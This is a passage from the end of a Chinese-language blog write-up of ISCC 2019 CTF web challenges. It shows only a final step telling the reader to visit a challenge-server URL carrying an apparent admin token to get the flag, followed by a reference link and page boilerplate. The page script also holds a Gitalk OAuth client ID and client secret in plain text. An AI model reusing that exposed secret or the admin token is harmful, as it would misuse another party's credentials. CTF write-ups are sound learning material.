<p>访问 <a href="http://39.100.83.188:8053/text/admin:22f1e0aa7a31422ad63480aa27711277" target="_blank" rel="noopener">http://39.100.83.188:8053/text/admin:22f1e0aa7a31422ad63480aa27711277</a> 获得 flag</p>
<p><img src="/.com//%E7%BD%91%E5%AE%89%E5%AD%A6%E4%B9%A0/blog/blogs/source/_posts/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/27.png" alt></p>
<p>参考链接：<br><strong><em><a href="https://www.anquanke.com/post/id/145540" target="_blank" rel="noopener">https://www.anquanke.com/post/id/145540</a></em></strong></p>
</div><div class="post-copyright"><blockquote><p>原文作者: fzykn06</p><p>原文链接: <a href="http://yoursite.com/2019/05/16/ISCC2019部分题解/">http://yoursite.com/2019/05/16/ISCC2019部分题解/</a></p><p>版权声明: 转载请注明出处(必须保留作者署名及链接)</p></blockquote></div><div class="tags"><a href="/tags/CTF/">CTF</a></div><div class="post-share"><div class="social-share"><span>分享到:</span></div><div data-thread-key="2019/05/16/ISCC2019部分题解/" data-title="ISCC2019部分题解" data-url="http://yoursite.com/2019/05/16/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/" class="ds-share flat"><div class="ds-share-inline"><ul class="ds-share-icons-16"><li data-toggle="ds-share-icons-more"><a href="javascript:void(0);" class="ds-more">分享到:</a></li><li><a href="javascript:void(0);" data-service="weibo" class="ds-weibo">微博</a></li><li><a href="javascript:void(0);" data-service="qzone" class="ds-qzone">QQ空间</a></li><li><a href="javascript:void(0);" data-service="qqt" class="ds-qqt">腾讯微博</a></li><li><a href="javascript:void(0);" data-service="wechat" class="ds-wechat">微信</a></li></ul><div class="ds-share-icons-more"></div></div></div><div class="bdsharebuttonbox"><span style="float:left;line-height: 28px;height: 28px;font-size:16px;font-weight:blod">分享到:</span><a href="#" data-cmd="more" class="bds_more"></a><a href="#" data-cmd="mshare" title="分享到一键分享" class="bds_mshare"></a><a href="#" data-cmd="fbook" title="分享到Facebook" class="bds_fbook"></a><a href="#" data-cmd="twi" title="分享到Twitter" class="bds_twi"></a><a href="#" data-cmd="linkedin" title="分享到linkedin" class="bds_linkedin"></a><a href="#" data-cmd="youdao" title="分享到有道云笔记" class="bds_youdao"></a><a href="#" data-cmd="evernotecn" title="分享到印象笔记" class="bds_evernotecn"></a><a href="#" data-cmd="weixin" title="分享到微信" class="bds_weixin"></a><a href="#" data-cmd="qzone" title="分享到QQ空间" class="bds_qzone"></a><a href="#" data-cmd="tsina" title="分享到新浪微博" class="bds_tsina"></a></div><div class="jiathis_style"><span class="jiathis_txt">分享到:</span><a class="jiathis_button_tsina"></a><a class="jiathis_button_qzone"></a><a class="jiathis_button_weixin"></a><a class="jiathis_button_fb"></a><a class="jiathis_button_linkedin"></a><a class="jiathis_button_twitter"></a><a class="jiathis_button_ydnote"></a><a href="http://www.jiathis.com/share" target="_blank" rel="noopener" class="jiathis jiathis_txt jiathis_separator jtico jtico_jiathis"></a><a class="jiathis_counter_style"></a></div></div><div id="comments"><div id="container"><script type="text/javascript" src="https://unpkg.com/gitalk/dist/gitalk.min.js?v=2.0.4"></script><script type="text/javascript" src="//cdn.bootcss.com/blueimp-md5/2.10.0/js/md5.js?v=2.0.4"></script><script>var gitalk = new Gitalk({
  clientID: '1817bee0e9bebbfec568',
  clientSecret: '0fed554209288ad9037d80cb0f5512d26423ad31',
  repo: 'fzykn06.github.io',
  owner: 'fzykn06',
  admin: ['fzykn06'],
  id: md5(window.location.pathname),
  distractionFreeMode: false,
  language: 'zh-CN',
  pagerDirection: 'last'
})
gitalk.render('container')</script></div></div></div></div></div><div class="layout-r"><div id="sidebar"><div class="search-pla"></div><div id="toc" class="widget"><div class="widget-title"><i class="fa fa-fei">文章目录</i></div><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#前言"><span class="toc-text">前言</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#web"><span class="toc-text">web</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#web1"><span class="toc-text">web1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web2"><span class="toc-text">web2</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web3"><span class="toc-text">web3</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web4"><span class="toc-text">web4</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web5"><span class="toc-text">web5</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#web6"><span class="toc-text">web6</span></a></li></ol></li></ol></li></ol></div><div class="widget"><div class="widget-title"><i class="fa fa-xie"> 最新文章</i></div><ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2019/05/16/ISCC2019%E9%83%A8%E5%88%86%E9%A2%98%E8%A7%A3/">ISCC2019部分题解</a></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-biao"> 标签</i></div><div class="tagcloud"><a href="/tags/CTF/" style="font-size: 15px;">CTF</a></div></div><div class="widget"><div class="widget-title"><i class="fa fa-archive"> 归档</i></div><ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2019/">2019</a><span class="archive-list-count">1</span></li></ul></div><div class="widget"><div class="widget-title"><i class="fa fa-you"> 友情链接</i></div><ul></ul><a href="https://nikoeurus.github.io/" title="Somnus's blog" target="_blank">Somnus's blog</a></div></div></div></div><a id="totop" href="#top"></a><div id="footer"><div class="footer-info"><p><a href="/baidusitemap.xml">网站地图</a> |  <a href="/atom.xml">订阅本站</a> |  <a href="/about/">联系博主</a></p><p>本站总访问量：<i id="busuanzi_container_site_pv"><i id="busuanzi_value_site_pv"></i></i>次，本站总访客数:<i id="busuanzi_container_site_uv"><i id="busuanzi_value_site_uv"></i></i>人</p><p><span> Copyright &copy;<a href="/." rel="nofollow">fzykn06.</a></span><span> Theme by<a rel="nofollow" target="_blank" href="https://github.com/chaooo/hexo-theme-BlueLake"> BlueLake.</a></span><span> Count by<a href="http://busuanzi.ibruce.info/" target="_blank" rel="noopener"> busuanzi.</a></span><span> Powered by<a rel="nofollow" target="_blank" href="https://hexo.io"> Hexo.</a></span></p></div></div></div><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><script type="text/javascript" src="/js/search.json.js?v=2.0.4"></script><script type="text/javascript" src="/js/toctotop.js?v=2.0.4" async></script><link rel="stylesheet" type="text/css" href="/share/css/share.css"><script type="text/javascript" src="/share/js/social-share.js" charset="utf-8"></script><script type="text/javascript" src="/share/js/qrcode.js" charset="utf-8"></script><script>window._bd_share_config={"common":{"bdSnsKey":{},"bdText":"","bdMini":"2","bdMiniList":["mshare","weixin","tsina","qzone","linkedin","fbook","twi","print","renren","sqq","evernotecn","bdysc","tqq","tqf","bdxc","kaixin001","tieba","douban","bdhome","thx","ibaidu","meilishuo","mogujie","diandian","huaban","duitang","hx","fx","youdao","sdo","qingbiji","people","xinhua","mail","isohu","yaolan","wealink","ty","iguba","h163","copy"],"bdPic":"","bdStyle":"1","bdSize":"16"},"share":{},"image":{"viewList":["tsina","qzone","weixin","fbook","twi","linkedin","youdao","evernotecn","mshare"],"viewText":"分享到：","viewSize":"16"},"selectShare":{"bdContainerClass":null,"bdSelectMiniList":["tsina","qzone","weixin","fbook","twi","linkedin","youdao","evernotecn","mshare"]}};with(document)0[(getElementsByTagName('head')[0]||head).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
</script><script>var jiathis_config={
    data_track_clickback:true,
    summary:"",
    shortUrl:true,
    hideMore:false
}</script><script type="text/javascript" src="http://v3.jiathis.com/code/jia.js" charset="utf-8"></script></body></html>